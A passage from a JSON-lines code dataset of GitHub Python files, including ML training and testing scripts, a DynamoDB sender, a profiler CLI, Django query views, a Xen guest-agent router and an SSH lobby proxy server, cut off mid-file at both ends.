default='residual', choices=['none', 'input_skip', 'residual'],\r\n help='progressive type for input')\r\n opt.add_argument('--progressive_combine', type=str, default='sum', choices=['sum', 'cat'],\r\n help='progressive combine method.')\r\n \r\n opt.add_argument('--embedding_type', type=str, default='positional', choices=['positional', 'fourier'],\r\n help='type of time embedding')\r\n opt.add_argument('--fourier_scale', type=float, default=16.,\r\n help='scale of fourier transform')\r\n opt.add_argument('--not_use_tanh', action='store_true',default=False)\r\n \r\n #geenrator and training\r\n opt.add_argument('--exp', default='experiment_cifar_default', help='name of experiment')\r\n opt.add_argument('--dataset', default='cifar10', help='name of dataset')\r\n opt.add_argument('--nz', type=int, default=100)\r\n opt.add_argument('--num_timesteps', type=int, default=4)\r\n\r\n opt.add_argument('--z_emb_dim', type=int, default=256)\r\n opt.add_argument('--t_emb_dim', type=int, default=256)\r\n opt.add_argument('--batch_size', type=int, default=128, help='input batch size')\r\n opt.add_argument('--num_epoch', type=int, default=1200)\r\n opt.add_argument('--ngf', type=int, default=64)\r\n\r\n opt.add_argument('--lr_g', type=float, default=1.5e-4, help='learning rate g')\r\n opt.add_argument('--lr_d', type=float, default=1e-4, help='learning rate d')\r\n opt.add_argument('--beta1', type=float, default=0.5,\r\n help='beta1 for adam')\r\n opt.add_argument('--beta2', type=float, default=0.9,\r\n help='beta2 for adam')\r\n opt.add_argument('--no_lr_decay',action='store_true', default=False)\r\n \r\n opt.add_argument('--use_ema', action='store_true', default=False,\r\n help='use EMA or not')\r\n opt.add_argument('--ema_decay', type=float, default=0.9999, help='decay rate for EMA')\r\n \r\n opt.add_argument('--r1_gamma', type=float, default=0.05, help='coef for r1 reg')\r\n opt.add_argument('--lazy_reg', type=int, default=None,\r\n help='lazy regulariation.')\r\n\r\n opt.add_argument('--save_content', action='store_true',default=False)\r\n opt.add_argument('--save_content_every', type=int, default=50, help='save content for resuming every x epochs')\r\n opt.add_argument('--save_ckpt_every', type=int, default=25, help='save ckpt every x epochs')\r\n \r\n ###ddp\r\n opt.add_argument('--num_proc_node', type=int, default=1,\r\n help='The number of nodes in multi node env.')\r\n opt.add_argument('--num_process_per_node', type=int, default=1,\r\n help='number of gpus')\r\n opt.add_argument('--node_rank', type=int, default=0,\r\n help='The index of node.')\r\n opt.add_argument('--local_rank', type=int, default=0,\r\n help='rank of process in the node')\r\n opt.add_argument('--master_address', type=str, default='127.0.0.1',\r\n help='address for master')\r\n opt.add_argument('--adaptive_loss', action=\"store_true\", help='whether to use a learned weight of loss for different stages')\r\n opt.add_argument('--name', type=str, default=None, help='name of the experiment. It decides where to store samples and models')\r\n opt.add_argument('--gpu_ids', type=str, default='0', help='gpu ids: e.g. 0 0,1,2, 0,2. use -1 for CPU')\r\n opt.add_argument('--model', type=str, default='eld_model', help='chooses which model to use.', choices=model_names)\r\n opt.add_argument('--checkpoints_dir', type=str, default='./checkpoints', help='models are saved here')\r\n opt.add_argument('--resume', '-r', action='store_true', help='resume from checkpoint')\r\n opt.add_argument('--resume_epoch', '-re', type=int, default=None, help='checkpoint to use. (default: latest')\r\n opt.add_argument('--seed', type=int, default=2018, help='random seed to use. Default=2018')\r\n\r\n # for setting input\r\n opt.add_argument('--serial_batches', action='store_true', help='if true, takes images in order to make batches, otherwise takes them randomly')\r\n opt.add_argument('--nThreads', default=8, type=int, help='# threads for loading data')\r\n opt.add_argument('--chop', action='store_true', help='enable forward_chop')\r\n\r\n # for display\r\n opt.add_argument('--no-log', action='store_true', help='disable tf logger?')\r\n opt.add_argument('--no-verbose', action='store_true', help='disable verbose info?')\r\n opt.add_argument('--debug', action='store_true', help='debugging mode')\r\n\r\n opt.add_argument('--iter_num', type=int, default=2)\r\n opt.add_argument('--netG', type=str, default='unet', help='chooses which architecture to use for netG.')\r\n opt.add_argument('--adaptive_res_and_x0', action=\"store_true\", help='adaptively combine the clean image and the image removed noise')\r\n opt.add_argument('--with_photon', action=\"store_true\")\r\n opt.add_argument('--concat_origin', action=\"store_true\")\r\n \r\n opt.add_argument('--resid', action=\"store_true\", help='predict the noise instead of the clean image')\r\n opt.add_argument('--channels', '-c', type=int, default=4, help='in/out channels (4: bayer; 9: xtrans')\r\n opt.add_argument('--stage_in', type=str, default='raw', help='input stage [raw|srgb]')\r\n opt.add_argument('--stage_out', type=str, default='raw', help='output stage [raw|srgb]')\r\n opt.add_argument('--stage_eval', type=str, default='raw', help='output stage [raw|srgb]')\r\n opt.add_argument('--model_path', type=str, default=None, help='model checkpoint to use.')\r\n opt.add_argument('--include', type=int, default=None, help='select camera in ELD dataset')\r\n opt.add_argument('--gt_wb', action='store_true', help='use white balance of ground truth')\r\n opt.add_argument('--crf', action='store_true', help='use CRF to render sRGB images')\r\n opt.add_argument('--epoch', type=int, default=200)\r\n \r\n opt = opt.parse_args()\r\n opt.world_size = opt.num_proc_node * opt.num_process_per_node\r\n size = opt.num_process_per_node\r\n opt.display_freq = 20\r\n opt.print_freq = 20\r\n opt.nEpochs = 40\r\n opt.max_dataset_size = 100\r\n opt.no_log = False\r\n opt.nThreads = 0\r\n opt.decay_iter = 0\r\n opt.serial_batches = True\r\n opt.no_flip = True\r\n if size > 1:\r\n processes = []\r\n for rank in range(size):\r\n opt.local_rank = rank\r\n global_rank = rank + opt.node_rank * opt.num_process_per_node\r\n global_size = opt.num_proc_node * opt.num_process_per_node\r\n opt.global_rank = global_rank\r\n print('Node rank %d, local proc %d, global proc %d' % (opt.node_rank, rank, global_rank))\r\n p = Process(target=init_processes, args=(global_rank, global_size, train, opt))\r\n p.start()\r\n processes.append(p)\r\n \r\n for p in processes:\r\n p.join()\r\n else:\r\n print('starting in debug mode')\r\n \r\n init_processes(0, size, train, opt)\r\n \r\n ","repo_name":"mm2319/Test","sub_path":"denoising-diffusion-gan/train_ddgan.py","file_name":"train_ddgan.py","file_ext":"py","file_size_in_byte":11224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10479233246","text":"from __future__ import absolute_import\nfrom __future__ import print_function\n\nimport os\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\nfrom shutil import copyfile\n\nfrom testing_simulation import Simulation\nfrom generator import TrafficGenerator\nfrom model import TestModel\nfrom visualization import Visualization\nfrom utils import import_test_configuration, set_sumo, set_test_path\n\n\nfrom random import randrange\nimport statistics\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nif __name__ == \"__main__\":\n\n config = import_test_configuration(config_file=os.path.join(os.getcwd(),\"PCD_Traffic_Light_Control\",\"DDQN\",'testing_settings.ini'))\n sumo_cmd = set_sumo(config['gui'], config['sumocfg_file_name'], config['max_steps'])\n model_path, plot_path = set_test_path(config['models_path_name'], config['model_to_test'])\n\n Model = TestModel(\n input_dim=config['num_states'],\n model_path=model_path\n )\n\n TrafficGen = TrafficGenerator(\n config['max_steps'], \n config['n_cars_generated'],\n config['art_queue'],\n None\n )\n #None or \"NS\" or \"EW\"\n\n Visualization = Visualization(\n plot_path, \n dpi=96\n )\n \n Simulation = Simulation(\n Model,\n TrafficGen,\n sumo_cmd,\n config['max_steps'],\n config['green_duration'],\n config['yellow_duration'],\n config['num_cells'],\n config['num_states'],\n config['num_actions'],\n config['n_cars_generated'],\n config['static_traffic_lights'] #STL or NOT\n )\n \n reward=0 #reward\n episode = 0 #episode number\n ql=[] #queue length vector for 5 episodes\n awt=[] #average waiting time per vehicle vector for 5 episodes\n total_testing_simulation_time=0\n\n #seed = [i + config['episode_seed'] for i in [1, 2, 3, 4, 5]] could have used it\n\n cuts = [0]\n\n\n #seed = [randrange(5, 100000) for i in range(0,5)] #seeds for reproducibility\n seed = [45715, 92490, 80265, 3957, 40983]\n while episode < 5:\n print('\\n----- Test episode n°', episode)\n simulation_time = Simulation.run(seed[episode])\n print('Simulation time:', simulation_time, 's')\n \n total_testing_simulation_time += simulation_time\n reward+=Simulation._sum_neg_reward \n ql.append(Simulation._sum_queue_length)\n awt.append(Simulation._sum_queue_length/sum(Simulation._waits))\n episode += 1\n \n cuts.append(len(Simulation.reward_episode))\n\n\n print('\\n----- Testing finished -----')\n print('Total testing simulation time:', total_testing_simulation_time, 's')\n avg_reward = reward/5\n twt = sum(ql)/5\n awt = statistics.median(awt)\n\n\n print(\"----- Testing info saved at:\", plot_path)\n copyfile(src='testing_settings.ini', dst=os.path.join(plot_path, 'testing_settings.ini')) #Save to recall the test settings\n \n # print(\"Saved into informations.txt\")\n # f = open(os.path.join(plot_path, \"informations\"), \"a\")\n # f.write(\"\\n----- Total simulation time : \" + str(total_testing_simulation_time))\n # f.write(\"\\n----- nrw : \" + str(avg_reward))\n # f.write(\"\\n----- twt : \" + str(twt))\n # f.write(\"\\n----- awt : \" + str(awt))\n # f.write(\"\\n----- seeds : \" + str(seed))\n # f.write(\"\\n\\n\")\n # f.close()\n\n #Print informations for average episodes\n print('seeds', seed)\n print('nrw', avg_reward)\n print('twt', twt)\n print('awt', awt)\n #print('Action step cuts', cuts)\n\n #The 5 cruve profiles are side by side\n Visualization.save_data_and_plot(data=Simulation.reward_episode, filename='reward',title=\"Reward during testing\", xlabel='Action step', ylabel='Reward')\n Visualization.save_data_and_plot(data=Simulation.queue_length_episode, filename='queue', title=\"Queue length during testing\", xlabel='Step', ylabel='Queue length (vehicles)')\n\n\n Visualization.save_data_and_plot(data=Simulation.reward_episode[:cuts[1]], filename='reward_1',title=\"Reward during testing\", xlabel='Action step', ylabel='Reward')\n Visualization.save_data_and_plot(data=Simulation.queue_length_episode[:config['max_steps']], filename='queue_1', title=\"Queue length during testing\", xlabel='Step', ylabel='Queue length (vehicles)')\n #Visualization.save_data_x_y_and_plot(data_x=Simulation.xs, data_y=Simulation.reward_episode, filename='reward_steps',title=\"Reward during testing\", xlabel='Step', ylabel='Reward')\n\n #Average DOES NOT WORK BECAUSE NOT SAME AMOUNT OF POINTS\n #Visualization.save_data_and_plot(data=[(Simulation.reward_episode[i]+Simulation.reward_episode[i+cuts[0]]+Simulation.reward_episode[i+cuts[1]] + Simulation.reward_episode[i+cuts[2]] + Simulation.reward_episode[i+cuts[3]])/5 for i in range(cuts[0])], filename='reward_avg',title=\"Reward average during testing\", xlabel='Action step', ylabel='Reward average')\n \n Visualization.save_data_and_plot(data=[(Simulation.queue_length_episode[i]+Simulation.queue_length_episode[i+config['max_steps']]+Simulation.queue_length_episode[i+(2*config['max_steps'])] + Simulation.queue_length_episode[i+(3*config['max_steps'])] + Simulation.queue_length_episode[i+(4*config['max_steps'])])/5 for i in range(5400)], filename='queue_avg', title=\"Queue length average during testing\", xlabel='Step', ylabel='Queue length average (vehicles)')\n\n\n #LINEAR INTERPOLATION\n # mean_x_axis = [i for i in range(max(Simulation.xs))]\n # ys_interp = [np.interp(mean_x_axis, Simulation.xs[cuts[i]:cuts[i+1]], Simulation.reward_episode[cuts[i]:cuts[i+1]]) for i in range(len(cuts)-1)]\n # mean_y_axis = np.mean(ys_interp, axis=0)\n # Visualization.save_data_x_y_and_plot(data_x=mean_x_axis, data_y=mean_y_axis, filename='reward_avg_linear_interpolation_steps',title=\"Reward average linear interpolation\", xlabel='Step', ylabel='Reward average')\n\n # max_mean_x_axis = [abs(cuts[i+1] - cuts[i]) for i in range(len(cuts)-1)]\n # mean_x_axis = [i for i in range(max(max_mean_x_axis))]\n # ys_interp = [np.interp(mean_x_axis, Simulation.xs[cuts[i]:cuts[i+1]], Simulation.reward_episode[cuts[i]:cuts[i+1]]) for i in range(len(cuts)-1)]\n # mean_y_axis = np.mean(ys_interp, axis=0)\n # Visualization.save_data_x_y_and_plot(data_x=mean_x_axis, data_y=mean_y_axis, filename='reward_avg_linear_interpolation_action_steps',title=\"Reward average linear interpolation\", xlabel='Action Step', ylabel='Reward average')\n","repo_name":"yessine-zghal/PCD_Traffic_Light_Control","sub_path":"DDQN/testing_main.py","file_name":"testing_main.py","file_ext":"py","file_size_in_byte":6385,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"27540993935","text":"import boto3\nimport botocore\nfrom model.temperature_reading import TemperatureReading\n\n\nclass DynamoDbSender:\n def __init__(self, table):\n self.table_name = table\n dynamodb = boto3.resource('dynamodb')\n self.table = dynamodb.Table(self.table_name)\n\n def send(self, temperature_reading: TemperatureReading):\n try:\n self.table.put_item(Item=temperature_reading.get_dict())\n except botocore.exceptions.ClientError as e:\n print(\"Unexpected error: %s\" % e)\n","repo_name":"justinharringa/pi-temp-monitor","sub_path":"sender/dynamodb_sender.py","file_name":"dynamodb_sender.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"35962364516","text":"import argparse\nimport logging\nimport shutil\n\nfrom . import DiscopopCpp\nfrom discopop_library.global_data.version.utils import get_version\n\nPROG = \"discopop_profiler\"\n\nUSAGE = f\"\"\"{PROG} [--verbose] [--clang CLANG]\n {'':{len(PROG)}} (--CUGeneration | --DPInstrumentation | --DPReduction)\n {'':{len(PROG)}} \n\"\"\"\n\n\ndef main(args=None):\n parser = argparse.ArgumentParser(prog=PROG, description=__doc__, usage=USAGE, add_help=False)\n parser.add_argument(\"-h\", \"--help\", action=\"help\", help=\"Show this help message and exit.\")\n parser.add_argument(\n \"-V\",\n \"--version\",\n action=\"version\",\n version=f\"%(prog)s {get_version()}\",\n help=\"Show version number and exit.\",\n )\n parser.add_argument(\n \"-v\",\n \"--verbose\",\n action=\"store_true\",\n help=\"Show additional information such as clang++ invocations.\",\n )\n parser.add_argument(\"--clang\", help=\"Path to clang++ executable.\")\n action = parser.add_mutually_exclusive_group()\n action.add_argument(\n \"--CUGeneration\",\n \"--cugeneration\",\n action=\"store_true\",\n help=\"Obtain the computational unit (CU) graph of the target application.\",\n )\n action.add_argument(\n \"--DPInstrumentation\",\n \"--dpinstrumentation\",\n action=\"store_true\",\n help=\"Instrument the target application to obtain data dependences.\",\n )\n action.add_argument(\n \"--DPReduction\",\n \"--dpreduction\",\n action=\"store_true\",\n help=\"Instrument the target application to obtain the list of reduction operations.\",\n )\n parameters, clang_args = parser.parse_known_args(args)\n\n logging.basicConfig(\n format=\"%(message)s\",\n level=logging.INFO if parameters.verbose else logging.WARNING,\n )\n\n if not any([parameters.CUGeneration, parameters.DPInstrumentation, parameters.DPReduction]):\n logging.warning(\n \"Warning: Not using any DiscoPoP LLVM pass (specify either --CUGeneration, \"\n \"--DPInstrumentation or --DPReduction).\",\n )\n clang_path = parameters.clang or shutil.which(\"clang++-8\") or shutil.which(\"clang++\")\n if not clang_path:\n raise SystemExit(\"clang++ executable not found in PATH. Specify --clang PATH/TO/CLANG++.\")\n if not clang_args:\n logging.warning(\"Warning: No arguments to clang++ were given.\")\n\n clang_proc = DiscopopCpp(\n cugeneration=parameters.CUGeneration,\n dpinstrumentation=parameters.DPInstrumentation,\n dpreduction=parameters.DPReduction,\n clang_path=clang_path,\n ).invoke(clang_args)\n if clang_proc.returncode != 0:\n raise SystemExit(clang_proc.returncode)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"discopop-project/discopop","sub_path":"discopop_profiler/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":2763,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"72"} +{"seq_id":"18916028201","text":"from qlib.utils.logging import get_logger, log\n\nfrom ..controllers.dto import Result\nfrom ..controllers.dto.quality_dimension_detail import GetQualityDimensionDetailRes\nfrom ..entities.guideline import GuidelineMapper\nfrom ..entities.quality_dimension import QualityDimensionMapper\nfrom ..across.exception import QAINotFoundException\n\n\nlogger = get_logger()\n\n\nclass QualityDimensionDetailService:\n\n @log(logger)\n def get_quality_dimension_detail(self, guideline_name: str, qd_name: str):\n\n # QDテーブルからデータ取得\n quality_dimension = QualityDimensionMapper.query.\\\n join(GuidelineMapper, GuidelineMapper.id == QualityDimensionMapper.guideline_id).\\\n filter(QualityDimensionMapper.name == qd_name).\\\n filter(GuidelineMapper.name == guideline_name).first()\n\n # 品質特性が存在しないまたは削除されている場合エラー\n if quality_dimension is None or quality_dimension.delete_flag:\n raise QAINotFoundException('Q02404', 'not found quality dimension.')\n\n return GetQualityDimensionDetailRes(\n result=Result(code='Q02000', message='Success.'),\n quality_dimension=quality_dimension.to_dto()\n )\n\n","repo_name":"aistairc/qunomon","sub_path":"qunomon/src/backend/qai_testbed_backend/usecases/quality_dimension_detail.py","file_name":"quality_dimension_detail.py","file_ext":"py","file_size_in_byte":1238,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"72"} +{"seq_id":"33836833932","text":"\nfrom pyxs.exceptions import UnexpectedPacket\nfrom pyxs.client import Router\n\n\nfrom pyxs._internal import Event\nfrom pyxs._internal import NUL\nfrom pyxs._internal import Op\n\n\nimport select\n\n\nclass XenGuestRouter(Router):\n def __call__(self):\n try:\n while True:\n rlist, _wlist, _xlist = select.select(\n [self.connection, self.r_terminator], [], [])\n if not rlist:\n continue\n elif self.r_terminator in rlist:\n break\n\n packet = self.connection.recv()\n if packet.op == Op.WATCH_EVENT:\n event = Event(*packet.payload.split(NUL)[:-1])\n for monitor in self.monitors[event.token]:\n monitor.events.put(event)\n else:\n \"\"\"\n The try/except is the reason for the subclass from the\n pyxs package. Since this is on the guest only the below\n gets the packet payload and returns it without the\n validation piece failing.\n \"\"\"\n rvar = None\n try:\n self.rvars[packet.rq_id]\n rvar = self.rvars.pop(packet.rq_id, None)\n except Exception:\n temp_rq_id = list(self.rvars.keys())[0]\n rvar = self.rvars.pop(temp_rq_id, None)\n\n if rvar is None:\n raise UnexpectedPacket(packet)\n else:\n rvar.set(packet)\n finally:\n self.connection.close()\n self.r_terminator.close()\n self.w_terminator.close()\n","repo_name":"Rackspace-DOT/nova-agent","sub_path":"novaagent/xenbus.py","file_name":"xenbus.py","file_ext":"py","file_size_in_byte":1795,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"37898564557","text":"import json\r\nimport re\r\nimport numpy as np\r\n\r\nfrom gensim import corpora, models\r\n\r\nfrom stop_words import get_stop_words\r\nen_stop = get_stop_words('en')\r\nes_stop = get_stop_words('es')\r\n\r\nfrom nltk.stem.porter import PorterStemmer\r\np_stemmer = PorterStemmer()\r\n\r\nfrom nltk.tokenize import RegexpTokenizer\r\ntokenizer = RegexpTokenizer(r'\\w+')\r\n\r\nwith open('enDoc.txt') as line:\r\n document = line.read().splitlines()\r\n\r\ntime = 0\r\n\r\ntexts = []\r\n\r\n# loop through document list\r\nthefile = open('cleanDoc.txt', 'w')\r\nfor i in document:\r\n\r\n print(time)\r\n time = time + 1\r\n # clean and tokenize document string\r\n cleanString = re.sub('(http://\\S+|\\S*[^\\w\\s]\\S*)', '', i)\r\n\r\n raw = cleanString.lower()\r\n tokens = tokenizer.tokenize(raw)\r\n\r\n # remove stop words from tokens\r\n stopped_tokens_en = [i for i in tokens if not i in en_stop]\r\n #stopped_tokens = [i for i in stopped_tokens_en if not i in es_stop]\r\n\r\n # stem tokens\r\n stemmed_tokens = [p_stemmer.stem(i) for i in stopped_tokens_en]\r\n\r\n # add tokens to list\r\n str1 = ' '.join(stopped_tokens_en)\r\n thefile.write(str1)\r\n thefile.write('\\n')\r\n\r\n\r\nthefile.close()\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"finalproject2017/topicmodel","sub_path":"code/pro_data/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":1170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39995626596","text":"from django.shortcuts import render\nfrom django.http import HttpResponse, Http404\nfrom django.core.paginator import Paginator\n\nfrom .models import Creep, Type, Size, Alignment, Skill\n\nimport string\nimport json\nimport re\n\ndef load_damage_field(creep, field, creep_obj):\n\n damage_types = []\n for damage in getattr(creep, field).order_by('id'):\n damage_types.append(damage.value)\n\n damage_str = ', '.join(damage_types)\n creep_obj[field] = damage_str\n\ndef load_actions(creep, field, creep_obj):\n\n actions = []\n for action in getattr(creep, field).order_by('id'):\n action_obj = { }\n action_obj['name'] = action.name\n action_obj['desc'] = action.desc\n if action.attack_bonus:\n action_obj['attack_bonus'] = action.attack_bonus\n if action.damage_dice:\n action_obj['damage_dice'] = action.damage_dice\n if action.damage_bonus:\n action_obj['damage_bonus'] = action.damage_bonus\n actions.append(action_obj)\n\n creep_obj[field] = actions\n\ndef load_creep_fields(creep, fields):\n \n def has_field(field):\n if fields == 'none':\n return False\n elif fields == 'all':\n return True\n else:\n return field in fields\n\n creep_obj = { }\n\n if has_field('id'):\n creep_obj['id'] = creep.id\n if has_field('name'):\n creep_obj['name'] = string.capwords(creep.name)\n if has_field('size'):\n creep_obj['size'] = string.capwords(creep.size.value)\n if has_field('type'):\n creep_obj['type'] = creep.type.value\n if has_field('subtype'):\n if creep.subtype:\n creep_obj['subtype'] = creep.subtype.subtype\n else:\n creep_obj['subtype'] = ''\n if has_field('alignment'):\n creep_obj['alignment'] = creep.alignment.value\n\n if has_field('armor_class'):\n creep_obj['armor_class'] = creep.armor_class\n if has_field('hit_points'):\n creep_obj['hit_points'] = creep.hit_points\n if has_field('hitdice'):\n creep_obj['hit_dice'] \\\n = str(creep.hitdice_num) + 'd' + str(creep.hitdice_type)\n if has_field('speed'):\n creep_obj['speed'] = creep.speed\n\n if has_field('strength'):\n creep_obj['strength'] = creep.strength\n if has_field('dexterity'):\n creep_obj['dexterity'] = creep.dexterity\n if has_field('constitution'):\n creep_obj['constitution'] = creep.constitution\n if has_field('intelligence'):\n creep_obj['intelligence'] = creep.intelligence\n if has_field('wisdom'):\n creep_obj['wisdom'] = creep.wisdom\n if has_field('charisma'):\n creep_obj['charisma'] = creep.charisma\n\n if has_field('saving_throws'):\n for st in creep.saving_throws.order_by('ability'):\n creep_obj[st.ability.value + '_save'] \\\n = st.modifier\n\n if has_field('skills'):\n for creep_skill in creep.skills.order_by('skill'):\n creep_obj[creep_skill.skill.value] = creep_skill.modifier\n\n if has_field('damage_vulnerabilities'):\n load_damage_field(creep, 'damage_vulnerabilities', creep_obj)\n\n if has_field('damage_resistances'):\n load_damage_field(creep, 'damage_resistances', creep_obj)\n\n if has_field('damage_immunities'):\n load_damage_field(creep, 'damage_immunities', creep_obj)\n\n if has_field('condition_immunities'):\n conditions = []\n for condition in creep.condition_immunities.order_by('id'):\n conditions.append(condition.value)\n conditions_str = ', '.join(conditions)\n creep_obj['condition_immunities'] = conditions_str\n\n if has_field('senses'):\n creep_obj['senses'] = creep.senses\n\n if has_field('languages'):\n languages = []\n for language in creep.languages.order_by('id'):\n languages.append(language.value)\n languages_str = ', '.join(languages)\n creep_obj['languages'] = languages_str\n\n if has_field('challenge_rating'):\n cr_ratio = creep.challenge_rating.as_integer_ratio()\n creep_obj['cr_num'] = cr_ratio[0]\n creep_obj['cr_den'] = cr_ratio[1]\n\n if has_field('special_abilities'):\n load_actions(creep, 'special_abilities', creep_obj)\n if has_field('actions'):\n load_actions(creep, 'actions', creep_obj)\n if has_field('legendary_actions'):\n load_actions(creep, 'legendary_actions', creep_obj)\n if has_field('reactions'):\n load_actions(creep, 'reactions', creep_obj)\n\n return creep_obj\n\ndef creep_by_id(request, creep_id):\n \n creep = Creep.objects.get(id=int(creep_id))\n\n fields = 'all'\n if 'fields' in request.GET.keys():\n fields = request.GET['fields'].split(',')\n\n creep_obj = load_creep_fields(creep, fields)\n creep_json = json.dumps(creep_obj)\n\n return HttpResponse(creep_json)\n\nQUERY_PAGE_MAX = 20\n\ndef query_creeps(request):\n\n def get_url_field(field):\n if field in request.GET.keys():\n return request.GET[field]\n return None\n\n name_field = get_url_field('name')\n type_field = get_url_field('type')\n crmin_field = get_url_field('crmin')\n crmax_field = get_url_field('crmax')\n fields = get_url_field('fields')\n page = get_url_field('page')\n\n creeps = Creep.objects.order_by('name')\n if name_field is not None:\n name_filters = re.split(r'\\s+', name_field)\n for name_filt in name_filters:\n creeps = creeps.filter(name__contains=name_filt)\n\n if type_field is not None:\n creeps = creeps.filter(type__type__exact=type_field)\n\n if crmin_field is not None:\n creeps = creeps.filter(challenge_rating__gte=float(crmin_field))\n\n if crmax_field is not None:\n creeps = creeps.filter(challenge_rating__lte=float(crmax_field))\n\n if page is None:\n page = 1\n\n paginator = Paginator(creeps, QUERY_PAGE_MAX)\n page = paginator.page(page)\n\n creep_objs = []\n for creep in page.object_list:\n creep_objs.append(load_creep_fields(creep, fields))\n\n query_response = {\n 'num_creeps': paginator.count,\n 'num_creeps_per_page': paginator.per_page,\n 'creeps': creep_objs,\n }\n\n response_json = json.dumps(query_response)\n return HttpResponse(response_json)\n\ndef query_meta(request, field_name):\n\n if field_name == 'sizes':\n sizes = [size.value for size in Size.objects.filter(woc=True)]\n return HttpResponse(json.dumps(sizes))\n elif field_name == 'types':\n types = [ctype.value for ctype in Type.objects.filter(woc=True)]\n return HttpResponse(json.dumps(types))\n elif field_name == 'alignments':\n aligns = [align.value for align in Alignment.objects.filter(woc=True)]\n return HttpResponse(json.dumps(aligns))\n elif field_name == 'skills':\n skills = [skill.value for skill in Skill.objects.filter(woc=True)]\n return HttpResponse(json.dumps(skills))\n else:\n raise Http404('Unknown meta field name %s' % field_name)\n\n","repo_name":"mikeframpo/krumm","sub_path":"krummserver/creeps/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7003,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23645015914","text":"import logging\nimport os\nimport select\nimport socket\nimport threading\nfrom binascii import hexlify\nfrom io import StringIO\nfrom subprocess import Popen\nfrom typing import Dict, Optional, OrderedDict, Tuple\n\nimport paramiko\nfrom paramiko.channel import Channel\nfrom paramiko.transport import Transport\n\nfrom lobbyboy import __version__\nfrom lobbyboy.config import (\n LBConfig,\n LBServerMeta,\n load_local_servers,\n update_local_servers,\n)\nfrom lobbyboy.exceptions import (\n NoProviderException,\n ProviderException,\n UserCancelException,\n)\nfrom lobbyboy.provider import BaseProvider\nfrom lobbyboy.server import Server\nfrom lobbyboy.server_killer import ServerKiller\nfrom lobbyboy.utils import (\n DoGSSAPIKeyExchange,\n KeyTypeSupport,\n active_session,\n active_session_lock,\n available_server_db_lock,\n choose_option,\n confirm_ssh_key_pair,\n send_to_channel,\n)\n\nlogger = logging.getLogger(__name__)\n\n\nclass SocketHandlerThread(threading.Thread):\n def __init__(self, sock: socket, address, config: LBConfig, providers: Dict[str, BaseProvider]) -> None:\n super().__init__()\n self.socket_client = sock\n self.client_address = address\n self.config = config\n self.providers: Dict[str, BaseProvider] = providers\n self.killer = ServerKiller(providers, config.servers_db_path)\n self.channel: Optional[Channel] = None\n\n def choose_providers(self) -> BaseProvider:\n if not self.providers:\n send_to_channel(self.channel, \"There is no available providers.\")\n raise NoProviderException(\"Do not have available providers to provision a new server!\")\n default = None\n ask_prompt = \"Please choose a provider to create a new server: \"\n if len(self.providers) == 1:\n default = 0\n default_provider = next(iter(self.providers.keys()))\n ask_prompt = f\"Please choose a provider to create a new server [default: {default_provider}]: \"\n user_input = choose_option(\n self.channel,\n list(self.providers.keys()),\n option_prompt=\"Available VPS providers:\",\n ask_prompt=ask_prompt,\n default=default,\n )\n return list(self.providers.values())[user_input]\n\n def choose_server(self) -> LBServerMeta:\n available_servers: OrderedDict[str, LBServerMeta] = load_local_servers(self.config.servers_db_path)\n if not available_servers:\n send_to_channel(self.channel, \"There is no available servers, provision a new server...\")\n return self._ask_user_to_create_server()\n\n options = [\"Create a new server...\"]\n meta: LBServerMeta\n for meta in available_servers.values():\n server_desc = f\"{meta.provider_name} {meta.server_name} {meta.server_host}\"\n sessions_cnt = len(active_session.get(meta.server_name, []))\n options.append(f\"Enter {server_desc} ({sessions_cnt} active sessions)\")\n user_input = choose_option(\n self.channel,\n options,\n option_prompt=f\"There are {len(available_servers)} available servers:\",\n )\n\n logger.info(f\"user choose server input={user_input}.\")\n if user_input == 0:\n return self._ask_user_to_create_server()\n user_input -= 1\n return list(available_servers.values())[user_input]\n\n def _ask_user_to_create_server(self) -> LBServerMeta:\n provider: BaseProvider = self.choose_providers()\n meta: LBServerMeta = provider.create_server(self.channel)\n\n with available_server_db_lock:\n update_local_servers(self.config.servers_db_path, new=[meta])\n return meta\n\n def _create_proxy_process(self, slave_fd) -> Tuple[Popen, LBServerMeta]:\n # if has available servers, prompt login or create\n # if no, create, and redirect\n meta: LBServerMeta = self.choose_server()\n provider = self.providers.get(meta.provider_name)\n if not provider:\n raise NoProviderException(f\"not find provider for server {meta.server_name}\")\n\n ssh_command_units = provider.ssh_server_command(meta)\n ssh_command = \" \".join(str(i) for i in ssh_command_units)\n logger.info(f\"ssh to server {meta.server_name} {meta.server_host}: {ssh_command}\")\n send_to_channel(\n self.channel,\n f\"Redirect you to {meta.provider_name} server: {meta.server_name} ({meta.server_host})...\",\n )\n proxy_subprocess = Popen(\n ssh_command,\n shell=True,\n preexec_fn=os.setsid,\n stdin=slave_fd,\n stdout=slave_fd,\n stderr=slave_fd,\n universal_newlines=True,\n )\n with active_session_lock:\n active_session.setdefault(meta.server_name, []).append(self.channel.get_transport())\n return proxy_subprocess, meta\n\n def prepare_server(self, t: Transport, key_type: KeyTypeSupport = KeyTypeSupport.RSA) -> Optional[Server]:\n try:\n t.load_server_moduli()\n except: # noqa\n logger.error(\"(Failed to load moduli -- gex will be unsupported.)\")\n raise\n\n pri, _ = confirm_ssh_key_pair(key_type=key_type, save_path=self.config.data_dir, key_name=\"ssh_host_rsa_key\")\n host_key = paramiko.RSAKey.from_private_key(StringIO(pri))\n\n logger.info(\"Read host key: \" + hexlify(host_key.get_fingerprint()).decode())\n 